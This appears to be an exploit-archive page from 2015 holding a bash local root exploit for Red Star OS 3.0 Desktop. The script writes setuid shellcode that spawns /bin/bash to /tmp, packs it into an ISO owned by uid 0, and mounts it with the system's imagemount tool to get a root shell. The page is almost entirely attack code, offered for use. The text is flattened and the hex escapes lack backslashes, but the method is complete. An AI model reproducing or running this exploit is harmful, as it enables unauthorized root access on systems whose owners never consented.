Home / exploits Red Star 3.0 Desktop Local Root
Posted on 14 January 2015
#!/bin/bash # Another local 0day in Red Star 3.0 Desktop by TheGreatLeader # Run exploit in a X11 terminal and enjoy a root shell... # Create temp dir for our payload mkdir /tmp/DPRK # msfpayload linux/x86/exec PrependSetuid=true CMD=/bin/bash X echo -e -n "x7fx45x4cx46x01x01x01x00x00x00x00x00x00x00x00x00x02x00x03x00x01x00x00x00x54x80x04x08x34x00x00x00x00x00x00x00x00x00x00x00x34x00x20x00x01x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x80x04x08x00x80x04x08x88x00x00x00xbcx00x00x00x07x00x00x00x00x10x00x00x31xdbx6ax17x58xcdx80x6ax0bx58x99x52x66x68x2dx63x89xe7x68x2fx73x68x00x68x2fx62x69x6ex89xe3x52xe8x0ax00x00x00x2fx62x69x6ex2fx62x61x73x68x00x57x53x89xe1xcdx80" > /tmp/DPRK/TheGreatLeader # Set the setuid bit chmod 4755 /tmp/DPRK/TheGreatLeader # Create ISO and keep permissions, change file owner to root in the iso /usr/bin/mkisofs --quiet -R --uid 0 -o /tmp/TheGreatLeader.iso /tmp/DPRK # Delete temp payload rm -f /tmp/DPRK/TheGreatLeader # Mount the ISO imagemount -m /tmp/TheGreatLeader.iso -d /tmp/DPRK cd /tmp/DPRK # Enjoy your root shell :) ./TheGreatLeader
